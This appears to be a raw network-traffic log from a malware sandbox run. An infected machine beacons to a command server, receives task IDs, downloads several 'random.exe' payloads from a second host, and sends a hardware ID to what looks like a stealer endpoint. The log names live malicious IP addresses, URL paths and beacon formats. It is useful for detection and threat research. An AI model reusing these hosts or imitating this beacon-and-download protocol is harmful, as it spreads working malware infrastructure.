Dec 15, 2024 00:03:13.932714939 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:15.311074972 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	50261	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:17.086357117 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:18.591357946 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	50263	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:20.234610081 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:21.573195934 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	50264	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:23.337588072 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:24.668575048 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	50266	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:26.311824083 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:27.678925037 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	50267	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:29.438720942 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:30.770121098 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	50268	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:32.416933060 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:33.752505064 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	50270	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:35.502506971 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:36.879270077 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	50271	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:38.519165993 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:39.866753101 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	50273	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:41.625921011 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:42.966764927 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	50274	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:44.626261950 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:45.963701963 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	50275	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:47.725748062 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:03:49.066040993 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	50277	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:50.704786062 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:03:52.070724010 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 31 35 33 36 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 35 33 36 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 35 33 36 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 35 33 36 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1015360001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1015361001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1015362001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1015363001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	50278	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:52.208760977 CET	139	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 22:32:01 GMT If-None-Match: "675e0761-1c8c00"
Dec 15, 2024 00:03:53.538505077 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:52 GMT Last-Modified: Sat, 14 Dec 2024 22:32:01 GMT Connection: keep-alive ETag: "675e0761-1c8c00"

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	50281	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:55.902717113 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 36 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015360001&unit=246122658369
Dec 15, 2024 00:03:57.254858017 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	50282	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:57.385581017 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 22:32:07 GMT If-None-Match: "675e0767-1a6c00"
Dec 15, 2024 00:03:58.725399971 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:03:58 GMT Last-Modified: Sat, 14 Dec 2024 22:32:07 GMT Connection: keep-alive ETag: "675e0767-1a6c00"

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	50285	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:03:59.737508059 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 15, 2024 00:04:01.077316999 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 15, 2024 00:04:01.084381104 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="build"stok------JEBGCBAFCGDAAKFIDGIE--
Dec 15, 2024 00:04:01.523967028 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	50286	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:01.116185904 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 36 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015361001&unit=246122658369
Dec 15, 2024 00:04:02.477596045 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	50287	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:02.613518953 CET	138	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 22:30:05 GMT If-None-Match: "675e06ed-ed000"
Dec 15, 2024 00:04:03.973783016 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:03 GMT Last-Modified: Sat, 14 Dec 2024 22:30:05 GMT Connection: keep-alive ETag: "675e06ed-ed000"

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	50290	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:06.297334909 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015362001&unit=246122658369
Dec 15, 2024 00:04:07.668267012 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	50291	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:07.807271957 CET	138	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sat, 14 Dec 2024 22:30:33 GMT If-None-Match: "675e0709-29e800"
Dec 15, 2024 00:04:09.150291920 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:08 GMT Last-Modified: Sat, 14 Dec 2024 22:30:33 GMT Connection: keep-alive ETag: "675e0709-29e800"

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	50296	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:11.594043016 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015363001&unit=246122658369
Dec 15, 2024 00:04:12.938797951 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	50298	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:14.701469898 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:04:16.045269012 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	50301	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:17.682549953 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:04:19.024450064 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	50303	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:04:19.406512976 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 15, 2024 00:04:20.746853113 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
